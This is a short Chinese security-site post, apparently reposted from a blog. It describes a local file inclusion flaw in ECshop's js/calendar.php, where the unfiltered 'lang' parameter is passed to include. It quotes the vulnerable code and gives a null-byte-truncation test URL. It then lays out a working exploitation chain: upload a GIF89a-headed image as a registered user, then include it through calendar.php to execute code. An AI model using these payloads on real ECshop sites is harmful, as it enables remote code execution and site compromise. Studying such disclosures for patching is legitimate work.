频道栏目
首页 > 安全 > 网站安全 > 正文

ECshop本地包含漏洞

2012-07-14 10:02:25           
收藏   我要投稿
js/calendar.php
$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞
if (!file_exists(‘../languages/’. $lang . ‘/calendar.php’))
{ $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’. EC_CHARSET); include_once(‘../languages/’. $lang . ‘/calendar.php’);//这里包含,需要截断

测试代码: //

需要magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.)
 
利用方法:
先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含代码:
http://www.2cto.com /js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.
 
 
作者 Lynn’s blog
相关TAG标签 漏洞
上一篇:wordpress暴路径 影响所有版本
下一篇:Tipask存储型的XSS漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站